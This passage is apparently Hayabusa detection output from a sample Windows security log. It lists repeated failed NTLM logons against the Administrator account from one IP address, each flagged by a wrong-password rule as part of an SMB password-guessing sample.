01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWo4uVFtAbe4IjKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YAPdDqbMY4rYiuZ3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ai2WCQ3MkWwSeOy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ey1wbsD7w3fs02xP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sVGzidwZICNfLizg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zjGPMJ6RBw48Ejx : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MydK8AjPvyyckCEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fqkCliAQMiFffQU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITkku4kN4csBFyUB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g9kMkSFhKrT2Py : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1xKLdwujTmLEc9ts : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sAW1YzCQ3CreseaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhqBirEHOKPepR3n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uqSFXpzAWOnc90n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: McbeS9lRpbMc48jO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6J0d7dQUmJNKJlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QG3WU91rhTP9odx7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSQRgB8yMfhb03g1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bzbZjRXTc0XvV4Ry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3ShOCSaLGX4YBWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lIrydzi8nmY251Z1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4vlRksTGxAqEt9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJMnD0foEDbcNfTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNWppBJLFojEFtiF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7a9Tvr6ruDpiG2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBNIizCKz2ybc3eM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YwuXQhISpgfSFqZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeONLdrrauxqvgaT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RFqSH4toadsTideV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuMa0Juj1tjL6NDY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UA8zU0kJ6gAFqSaF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvX85gF8wk3AGJyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpzOMKQIBrkQW5Os : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqzrLAqHNi4CHT56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HWMap8qHlykO6Yeu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pkc9LWakJBjhBQv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y43cE75gTzA1XjHF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HopaYDAbYxHjJEr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: brNgudTWJaKs8nLd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzPwOqU92kdGodBH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXlzxK5OXL9hpqrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cLdgWvrVh7h2jPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h34xlYavVsXQRCYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6wjflwqXyFzYTi0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlsuCSajqGUYTBWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xQDdrQQZ5xYBDiRi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JX5NMuwUsOZEp3zh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfrbGLqKGru8AE2a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 813natbodi6QauRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KpfKxOZG3xSr5Yqm : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErWiEb0USDghXsB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fOWF6YnW8UEPlw41 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SNPXuHduatLFQc8W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 35rfur4MzKzwxCIn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VmAqzaZaeoSjcuh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKuCpuGcGmDOoewr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bz6SOAeTyqsBz6Oa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSURiEoC7dw0w0ru : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDjwkaHT8lrFmn9X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ayI129HgVWA5q4Sk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jT2yiuOJS8Fvf9SD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1hpAO2UrjFd6Kxt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZkgGj9Fnqn3XwnBT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFXPYo0yzR7p8dNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9j6MxN7PuM29Vlcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1CWIqoV6GzmmlRm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiBfvnfTcIG4xJoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dED7HYntoE5D7XvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pX1ztnCKiePrPbTT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3XQcfMHJDsBtJDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhRsRIS5tHKLv2oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmkLhptugDU2fDWp : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2yk62yREbgDCj9pB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6JPvkmaAsJlwn9t3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lhciP1zM9njlRI3j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.069 